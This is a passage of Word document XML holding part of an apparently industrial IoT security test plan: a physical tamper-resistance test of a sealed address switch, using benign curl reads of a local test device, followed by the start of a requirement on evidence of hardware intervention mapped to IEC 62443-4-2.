          <w:p w14:paraId="08461AF3" w14:textId="77777777" w:rsidR="005D11F1"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5D11F1" w14:paraId="0CD3AA0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F9F4D59" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D673E73" w14:textId="6B03802A" w:rsidR="005D11F1" w:rsidRPr="005D11F1" w:rsidRDefault="00223A4E"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23A4E">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ002-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D11F1" w:rsidRPr="00F15AEA" w14:paraId="0C58DC9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F2DB53E" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F0EA406" w14:textId="77777777" w:rsidR="00A916D2" w:rsidRDefault="00A916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A916D2">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Physical access to DUT 192.168.0.2; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39D8932A" w14:textId="77777777" w:rsidR="00A916D2" w:rsidRDefault="00A916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A916D2">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">management path Pi eth1 = 192.168.50.10 → IoT-Core (to read the applied address); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="078ECCF1" w14:textId="25B55DB4" w:rsidR="005D11F1" w:rsidRPr="005D11F1" w:rsidRDefault="00A916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A916D2">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>browser 192.168.50.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D11F1" w:rsidRPr="00316EA1" w14:paraId="6B93B85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147389" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54856E3C" w14:textId="77777777" w:rsidR="004C7169" w:rsidRDefault="004C7169"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C7169">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Manual (seal removal, switch actuation); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24B20CF4" w14:textId="77777777" w:rsidR="004C7169" w:rsidRDefault="004C7169"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C7169">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">camera (seal state); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53A13C50" w14:textId="1DE2E684" w:rsidR="005D11F1" w:rsidRPr="005D11F1" w:rsidRDefault="004C7169"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C7169">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>curl to read /safecom/f_address</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D11F1" w:rsidRPr="00316EA1" w14:paraId="0EFA7C1B"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1D13649B" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E8CF484" w14:textId="77777777" w:rsidR="00F4302C" w:rsidRPr="00F4302C"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 TC-RQ002-05 Physical tamper-resistance of the F-address switch (resistance only)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="108D3DC7" w14:textId="77777777" w:rsidR="00F4302C" w:rsidRPr="00F4302C"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curl -s http://192.168.0.2/safecom/f_address -o TC05_addr_before.json # baseline</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1587BC42" w14:textId="77777777" w:rsidR="00F4302C" w:rsidRPr="00F4302C"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 --- OPERATE: remove seal, change rotary switch; verify running address UNCHANGED ---</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="134DF5F6" w14:textId="77777777" w:rsidR="00F4302C" w:rsidRPr="00F4302C"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curl -s http://192.168.0.2/safecom/f_address -o TC05_addr_runtime.json # expect: == before (SRIO-10812)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30E1AADF" w14:textId="77777777" w:rsidR="00F4302C" w:rsidRPr="00F4302C"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 --- COLD RESTART ---</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C64F1F2" w14:textId="77777777" w:rsidR="00F4302C" w:rsidRPr="00F4302C"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curl -s http://192.168.0.2/safecom/f_address -o TC05_addr_afterboot.json # expect: == new switch value</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27A2AEF3" w14:textId="77777777" w:rsidR="00F4302C" w:rsidRPr="00F4302C"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 xml:space="preserve">diff TC05_addr_before.json TC05_addr_runtime.json | tee </w:t>
            </w:r>
            <w:r w:rsidRPr="00F4302C">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>TC05_runtime_diff.txt # expect: no change</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C074BFA" w14:textId="271E788B" w:rsidR="005D11F1" w:rsidRPr="005D11F1"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diff TC05_addr_runtime.json TC05_addr_afterboot.json | tee TC05_boot_diff.txt # expect: changed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D11F1" w:rsidRPr="00316EA1" w14:paraId="09A9777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A55035E" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A6ED9E1" w14:textId="7C77E7F4" w:rsidR="005D11F1" w:rsidRPr="005D11F1" w:rsidRDefault="00F4302C" w:rsidP="00BE3CFC">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Pr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Runtime change ignored</w:t>
            </w:r>
            <w:r w:rsidR="00A018BF">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/ Next-boot address corruptible</w:t>
            </w:r>
            <w:r w:rsidR="000D3183">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/ Resistance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D11F1" w:rsidRPr="00316EA1" w14:paraId="40AE5A1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557D057" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FF52D17" w14:textId="77777777" w:rsidR="003F3C1B" w:rsidRDefault="003F3C1B"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3F3C1B">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Seal before/after photos, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38D8D723" w14:textId="77777777" w:rsidR="003F3C1B" w:rsidRDefault="003F3C1B"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3F3C1B">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">TC05_addr_* reads, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54E06C7A" w14:textId="0BCFAAD1" w:rsidR="005D11F1" w:rsidRPr="005D11F1" w:rsidRDefault="003F3C1B"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3F3C1B">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC05_runtime_diff.txt, TC05_boot_diff.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="414384B8" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AE5D8E1" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B4BA6E4" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DB117C9" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15DDA021" w14:textId="77777777" w:rsidR="00D1454A" w:rsidRDefault="00D1454A" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39C930A9" w14:textId="77777777" w:rsidR="00D1454A" w:rsidRDefault="00D1454A" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42B96FD7" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46BE284B" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C91665B" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7109BE1B" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A0FF01B" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="485168A6" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="089A53B3" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72455161" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D9A2B36" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7510AA3B" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A76B7EA" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DD2E54F" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2111F429" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="010C5C84" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E593DCE" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73CDF4D9" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="416D789B" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BC21332" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FEA0B9B" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F86104B" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="750A1216" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B8024AD" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4281C0C8" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1651D122" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="719D0B31" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="516EED37" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C33CFBF" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13BFFFB9" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D110506" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D96598E" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D5FF4ED" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07B0038D" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35A35492" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="795355D1" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65E15FBA" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7228FB0F" w14:textId="7F1036E0" w:rsidR="009C0A46" w:rsidRPr="00F51953" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C1714F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">REQUIREMENT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293454BA"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57A33B29" w14:textId="04CD10FC" w:rsidR="009C0A46" w:rsidRPr="00897779" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MVO-ID: </w:t>
      </w:r>
      <w:r w:rsidR="00650EDB" w:rsidRPr="00650EDB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ-003</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C217AB3" w14:textId="14A20B13" w:rsidR="009C0A46" w:rsidRPr="00897779" w:rsidRDefault="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00693D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVO Requirement Text:</w:t>
      </w:r>
      <w:r w:rsidRPr="00897779">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00650EDB" w:rsidRPr="00650EDB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The system shall collect evidence of any legitimate or illegitimate intervention in hardware components relevant for connection or access to safety-critical software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6CE099" w14:textId="340B81E4" w:rsidR="009C0A46" w:rsidRPr="00897779" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">IEC 62443-4-2 CR Mapping: </w:t>
      </w:r>
      <w:r w:rsidR="00650EDB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002B7973">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00650EDB" w:rsidRPr="00650EDB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CR 2.8</w:t>
      </w:r>
      <w:r w:rsidR="001F2676">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> not directly for phy.</w:t>
      </w:r>
      <w:r w:rsidR="00650EDB" w:rsidRPr="00650EDB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="002B7973">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="005F4C5A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">CR 2.9, CR 2.10, </w:t>
      </w:r>
      <w:r w:rsidR="002B7973">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CR 2.11,</w:t>
      </w:r>
      <w:r w:rsidR="00650EDB" w:rsidRPr="00650EDB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002B7973">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00650EDB" w:rsidRPr="00650EDB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CR 2.12,</w:t>
      </w:r>
      <w:r w:rsidR="002B7973">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="001F3ACD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CR/EDR 2.13</w:t>
      </w:r>
      <w:r w:rsidR="005F4C5A">
        <w:rPr>
          <w:lang w:val="en-US"/>
